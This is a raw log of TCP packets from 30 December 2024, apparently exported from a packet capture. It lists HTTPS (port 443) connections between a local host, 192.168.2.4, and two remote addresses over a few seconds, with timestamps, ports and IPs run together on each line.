                                                                                                              Dec 30, 2024 11:37:20.223812103 CET44350402142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.223846912 CET50401443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.223854065 CET44350401142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.223885059 CET50402443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.224694014 CET50402443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.224701881 CET44350402142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.224953890 CET50402443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.224960089 CET44350402142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.378582954 CET44350404142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.378714085 CET50404443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.379266977 CET50404443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.379275084 CET44350404142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.379498005 CET50404443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.379503965 CET44350404142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.437510014 CET44350398142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.437575102 CET50398443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.437603951 CET44350398142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.437642097 CET50398443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.438194036 CET50398443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.438210011 CET44350398142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.438282013 CET44350398142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.438306093 CET50398443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.438339949 CET50398443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.438927889 CET50410443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.438970089 CET44350410142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.439189911 CET50410443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.440716028 CET50410443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.440741062 CET44350410142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.548748016 CET50401443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.548924923 CET50402443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.548943996 CET50404443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.548984051 CET50410443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.550285101 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.550322056 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.550482035 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.552207947 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.552218914 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.559478998 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.559577942 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.559664965 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.560779095 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:20.560833931 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.561533928 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.561585903 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:20.561881065 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.562736034 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:20.562750101 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.171864986 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.171958923 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.172444105 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.172455072 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.173079014 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.173192024 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.173871994 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.173958063 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.174751043 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.174756050 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.176472902 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.176482916 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.176731110 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.177073002 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.178181887 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.189882994 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.189941883 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.190998077 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.191046953 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.192780972 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.192787886 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.193030119 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.193080902 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.193450928 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.223337889 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.235328913 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.551640987 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.551762104 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.552627087 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.552654982 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.552676916 CET44350411142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.552748919 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.552748919 CET50411443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.553539991 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.553599119 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.553658009 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.554025888 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.554080009 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.554148912 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.554419041 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.554438114 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.554451942 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.554467916 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.566737890 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.567764044 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.568181992 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.570825100 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.570887089 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.570911884 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.570945024 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.570956945 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.571016073 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.571218014 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.576057911 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.576082945 CET44350412142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.576093912 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.576128960 CET50412443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.576903105 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.576937914 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.577016115 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.578249931 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:21.578270912 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.582624912 CET50413443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.582638979 CET44350413142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.583823919 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.583848000 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.584486008 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.588709116 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:21.588720083 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.155719042 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.155827999 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.156219959 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.156228065 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.156373978 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.156379938 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.167670965 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.167821884 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.168251038 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.168267012 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.170864105 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.170871973 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.185559034 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.185693979 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.186294079 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.186307907 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.186714888 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.186722994 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.206780910 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.206886053 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.207482100 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.207488060 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.207765102 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.207768917 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.540482998 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.540630102 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.540656090 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.540760040 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.541295052 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.541343927 CET44350422142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.541435003 CET50422443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.541882992 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.541928053 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.541990995 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.542423964 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.542438984 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.552974939 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.553029060 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.553088903 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.553117990 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.553143024 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.553224087 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.553872108 CET50421443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.553886890 CET44350421142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.554553986 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.554608107 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.554662943 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.554866076 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.554882050 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.557950020 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.558026075 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.558037996 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.558289051 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.558409929 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.558454037 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.558619022 CET44350423142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.558623075 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.558650017 CET50423443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.559242010 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.559267044 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.559401035 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.559911013 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:22.559919119 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.711910009 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.711952925 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.712021112 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.712034941 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.712080956 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.712127924 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.712665081 CET50424443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.712680101 CET44350424142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.713210106 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.713263035 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:22.713362932 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.713613033 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:22.713629007 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.141745090 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.141824961 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.142504930 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.142596006 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.144689083 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.144699097 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.144968987 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.145034075 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.145406008 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.172656059 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.172733068 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.178215981 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.178282022 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.178952932 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.179003954 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.181340933 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.181349993 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.181633949 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.181680918 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.183271885 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.187642097 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.187670946 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.189553022 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.189559937 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.191327095 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.227334023 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.316876888 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.317186117 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.324027061 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.324050903 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.324201107 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.324207067 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.505944014 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.505992889 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.506007910 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.506046057 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.506171942 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.506198883 CET44350435142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.506246090 CET50435443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.506855965 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.506911039 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.506973982 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.507229090 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.507242918 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.552498102 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.552603006 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.552798986 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.552840948 CET44350437142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.552994967 CET50437443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.553762913 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.553817034 CET44350440142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.553884029 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.554121017 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:23.554132938 CET44350440142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.588606119 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.588660955 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.588737965 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.588766098 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.588781118 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.588804007 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.588830948 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.589504957 CET50436443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.589519978 CET44350436142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.590373039 CET50441443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.590415955 CET44350441142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.592478991 CET50441443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.592694044 CET50441443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.592708111 CET44350441142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.735940933 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.735985994 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.736000061 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.736030102 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.736046076 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.736066103 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.736072063 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.736099958 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.736104965 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.736136913 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.736931086 CET50438443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.736943960 CET44350438142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.738001108 CET50442443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.738034964 CET44350442142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:23.738086939 CET50442443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.738409996 CET50442443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:23.738418102 CET44350442142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.107794046 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.107863903 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.108845949 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.108966112 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.133219004 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.133250952 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.133605003 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.133656979 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.134052038 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.153947115 CET44350440142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.154025078 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.154711962 CET44350440142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.154778957 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.156503916 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.156516075 CET44350440142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.156769037 CET44350440142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.156824112 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.157115936 CET50440443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.179342031 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.200078964 CET44350441142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.200143099 CET50441443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:24.200560093 CET50441443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:24.200572968 CET44350441142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.200742006 CET50441443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:24.200750113 CET44350441142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.203324080 CET44350440142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.337629080 CET44350442142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.337722063 CET50442443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:24.359750032 CET50442443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:24.359766960 CET44350442142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.359954119 CET50442443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:24.359963894 CET44350442142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.481803894 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.481966019 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.481997013 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.482445002 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.482651949 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.482702971 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.482749939 CET44350439142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:24.482800007 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.482855082 CET50439443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:24.483408928 CET50444443192.168.2.4142.250.186.142
